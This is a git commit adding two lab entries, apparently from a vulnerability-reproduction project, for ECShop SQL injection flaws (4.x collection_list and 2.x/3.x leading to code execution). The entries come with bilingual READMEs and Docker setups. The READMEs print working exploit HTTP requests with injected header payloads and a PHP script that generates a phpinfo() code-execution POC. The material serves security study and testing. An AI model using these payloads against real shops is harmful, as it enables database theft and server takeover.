first commit

ecshop/collection_list-sqli/README.md

@@ -0,0 +1,63 @@
+# ECShop 4.x `collection_list` SQL Injection
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+ECShop is a popular open-source e-commerce system. A SQL injection vulnerability exists in the `collection_list` functionality of ECShop 4.x versions, which allows attackers to execute arbitrary SQL queries through the `insert_` functions.
+
+References:
+
+- <https://mp.weixin.qq.com/s/xHioArEpoAqGlHJPfq3Jiw>
+- <http://foreversong.cn/archives/1556>
+
+## Environment Setup
+
+Execute the following command to start ECShop 4.0.6:
+
+```
+docker compose up -d
+```
+
+After the server starts, visit `http://your-ip:8080` to begin the installation process. During installation:
+
+- Set the database address to `mysql`
+- Set both username and password to `root`
+
+## Vulnerability Reproduction
+
+The vulnerability is similar to [xianzhi-2017-02-82239600](https://github.com/vulhub/vulhub/tree/master/ecshop/xianzhi-2017-02-82239600), where arbitrary `insert_` functions can be exploited for SQL injection.
+
+Multiple `insert_` functions can be used for exploitation. For example, using `insert_user_account`:
+
+```http
+GET /user.php?act=collection_list HTTP/1.1
+Host: your-ip:8080
+X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:"user_id";s:38:"0'-(updatexml(1,repeat(user(),2),1))-'";s:7:"payment";s:1:"4";}|45ea207d7a2b68c49582d2d22adf953a
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36
+Cookie: ECS_ID=f7b1398a0fdc189b691a6f1c969911ac1eea8fca;ECS[password]=445ac05c4ae0555ed091bb977b08581f;ECS[user_id]=3;ECS[username]=demo;ECS[visit_times]=2;ECSCP_ID=1a8bddd69b3b81efbe441a185ac52e7d24852d87;PHPSESSID=bb2033d66975ff7c2be29896d2d4260c;real_ipd=172.18.0.1;
+Connection: close
+
+```
+
+![](1.png)
+
+Note: You must be logged in as a normal user before attempting exploitation.
+
+Alternatively, you can use `insert_pay_log` as shown in this example:
+
+```http
+GET /user.php?act=collection_list HTTP/1.1
+Host: 192.168.1.162:8080
+X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953apay_log|s:44:"1' and updatexml(1,repeat(user(),2),1) and '";|
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36
+Cookie: ECS_ID=f7b1398a0fdc189b691a6f1c969911ac1eea8fca;ECS[password]=445ac05c4ae0555ed091bb977b08581f;ECS[user_id]=3;ECS[username]=demo;ECS[visit_times]=2;ECSCP_ID=1a8bddd69b3b81efbe441a185ac52e7d24852d87;PHPSESSID=bb2033d66975ff7c2be29896d2d4260c;real_ipd=172.18.0.1;
+Connection: close
+
+```
+
+![](2.png)

ecshop/collection_list-sqli/README.zh-cn.md

@@ -0,0 +1,61 @@
+# ECShop 4.x Collection List SQL注入漏洞
+
+ECShop是一个流行的开源电子商务系统。在ECShop 4.x版本的`collection_list`功能中存在SQL注入漏洞，攻击者可以通过`insert_`函数执行任意SQL查询。
+
+参考链接：
+
+- <https://mp.weixin.qq.com/s/xHioArEpoAqGlHJPfq3Jiw>
+- <http://foreversong.cn/archives/1556>
+
+## 环境搭建
+
+执行如下命令启动ECShop 4.0.6：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`进入安装向导。在安装过程中：
+
+- 将数据库地址设置为`mysql`
+- 将数据库用户名和密码都设置为`root`
+
+## 漏洞复现
+
+此漏洞原理与[xianzhi-2017-02-82239600](https://github.com/vulhub/vulhub/tree/master/ecshop/xianzhi-2017-02-82239600)类似，可以利用任意`insert_`函数进行SQL注入。
+
+有多个`insert_`函数可以用于漏洞利用。例如，使用`insert_user_account`：
+
+```http
+GET /user.php?act=collection_list HTTP/1.1
+Host: your-ip:8080
+X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:"user_id";s:38:"0'-(updatexml(1,repeat(user(),2),1))-'";s:7:"payment";s:1:"4";}|45ea207d7a2b68c49582d2d22adf953a
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36
+Cookie: ECS_ID=f7b1398a0fdc189b691a6f1c969911ac1eea8fca;ECS[password]=445ac05c4ae0555ed091bb977b08581f;ECS[user_id]=3;ECS[username]=demo;ECS[visit_times]=2;ECSCP_ID=1a8bddd69b3b81efbe441a185ac52e7d24852d87;PHPSESSID=bb2033d66975ff7c2be29896d2d4260c;real_ipd=172.18.0.1;
+Connection: close
+
+```
+
+![](1.png)
+
+注意：在尝试漏洞利用之前，必须先以普通用户身份登录。
+
+另外，你也可以使用`insert_pay_log`，如下例所示：
+
+```http
+GET /user.php?act=collection_list HTTP/1.1
+Host: 192.168.1.162:8080
+X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953apay_log|s:44:"1' and updatexml(1,repeat(user(),2),1) and '";|
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36
+Cookie: ECS_ID=f7b1398a0fdc189b691a6f1c969911ac1eea8fca;ECS[password]=445ac05c4ae0555ed091bb977b08581f;ECS[user_id]=3;ECS[username]=demo;ECS[visit_times]=2;ECSCP_ID=1a8bddd69b3b81efbe441a185ac52e7d24852d87;PHPSESSID=bb2033d66975ff7c2be29896d2d4260c;real_ipd=172.18.0.1;
+Connection: close
+
+```
+
+![](2.png)

ecshop/collection_list-sqli/docker-compose.yml

@@ -0,0 +1,11 @@
+services:
+ web:
+   image: vulhub/ecshop:4.0.6
+   depends_on:
+    - mysql
+   ports:
+    - "8080:80"
+ mysql:
+   image: mysql:5.5
+   environment: 
+    - MYSQL_ROOT_PASSWORD=root

ecshop/xianzhi-2017-02-82239600/README.md

@@ -0,0 +1,76 @@
+# ECShop 2.x/3.x SQL Injection / Remote Code Execution Vulnerability
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+ECShop is a B2C independent shop system for companies and individuals to quickly build personalized online store. This system is a cross-platform open source program based on PHP language and MYSQL database architecture.
+
+In 2017 and previous versions, there was a SQL injection vulnerability that could inject payload and eventually lead to code execution vulnerabilities. The latest version of 3.6.0 has fixed the vulnerability, and vulhub uses its latest version 2.7.3 and 3.6.0 non-latest version versions to reproduce the vulnerability.
+
+Reference link:
+
+- https://paper.seebug.org/691/
+
+## Environment setup
+
+Run the following commands to start environment
+
+```
+docker compose up -d
+```
+
+After the environment start, visit `http://your-ip:8080`, you will see the 2.7.3 installation page. Visit `http://your-ip:8081`, you will see the 3.6.0 installation page.
+
+Install both of them, mysql address is `mysql`, mysql account and password are `root`, the database name is free to fill in, but the database names of 2.7.3 and 3.6.0 can not be the same.
+
+As the picture shows:
+
+![](0.png)
+
+## Exploit
+
+There is a script that can generate POC for 2.x and 3.x:
+
+```php
+<?php
+$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");
+$id = "-1' UNION/*";
+$arr = [
+    "num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
+    "id" => $id
+];
+
+$s = serialize($arr);
+
+$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
+$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';
+
+echo "POC for ECShop 2.x: \n";
+echo "{$hash2}ads|{$s}{$hash2}";
+echo "\n\nPOC for ECShop 3.x: \n";
+echo "{$hash3}ads|{$s}{$hash3}";
+```
+
+Put POC in the HTTP-Referer:
+
+```
+GET /user.php?act=login HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Cookie: PHPSESSID=9odrkfn7munb3vfksdhldob2d0; ECS_ID=1255e244738135e418b742b1c9a60f5486aa4559; ECS[visit_times]=1
+Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
+Connection: close
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+
+```
+
+Result of 2.x:
+
+![](1.png)
+
+Result of 3.x:
+
+![](2.png)

ecshop/xianzhi-2017-02-82239600/README.zh-cn.md

@@ -0,0 +1,72 @@
+# ECShop 2.x/3.x SQL注入/任意代码执行漏洞
+
+ECShop是一款B2C独立网店系统，适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。
+
+其2017年及以前的版本中，存在一处SQL注入漏洞，通过该漏洞可注入恶意数据，最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞，vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞复现。
+
+参考链接：
+
+- https://paper.seebug.org/691/
+
+## 环境搭建
+
+执行如下命令启动ecshop 2.7.3与3.6.0：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`将看到2.7.3的安装页面，访问`http://your-ip:8081`将看到3.6.0的安装页面。
+
+依次安装二者，mysql地址填写`mysql`，mysql账户与密码均为`root`，数据库名随意填写，但2.7.3与3.6.0的数据库名不能相同。如图：
+
+![](0.png)
+
+## 漏洞复现
+
+我编写了一个脚本，可以生成2.x和3.x的POC：
+
+```php
+<?php
+$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");
+$id = "-1' UNION/*";
+$arr = [
+    "num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
+    "id" => $id
+];
+
+$s = serialize($arr);
+
+$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
+$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';
+
+echo "POC for ECShop 2.x: \n";
+echo "{$hash2}ads|{$s}{$hash2}";
+echo "\n\nPOC for ECShop 3.x: \n";
+echo "{$hash3}ads|{$s}{$hash3}";
+```
+
+生成的POC，放在Referer里发送：
+
+```
+GET /user.php?act=login HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Cookie: PHPSESSID=9odrkfn7munb3vfksdhldob2d0; ECS_ID=1255e244738135e418b742b1c9a60f5486aa4559; ECS[visit_times]=1
+Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
+Connection: close
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+
+```
+
+2.x的执行结果
+
+![](1.png)
+
+3.x的执行结果：
+
+![](2.png)

ecshop/xianzhi-2017-02-82239600/docker-compose.yml

@@ -0,0 +1,18 @@
+version: '2'
+services:
+ ecshop27:
+   image: vulhub/ecshop:2.7.3
+   depends_on:
+    - mysql
+   ports:
+    - "8080:80"
+ ecshop36:
+   image: vulhub/ecshop:3.6.0
+   depends_on:
+    - mysql
+   ports:
+    - "8081:80"
+ mysql:
+   image: mysql:5.5
+   environment: 
+    - MYSQL_ROOT_PASSWORD=root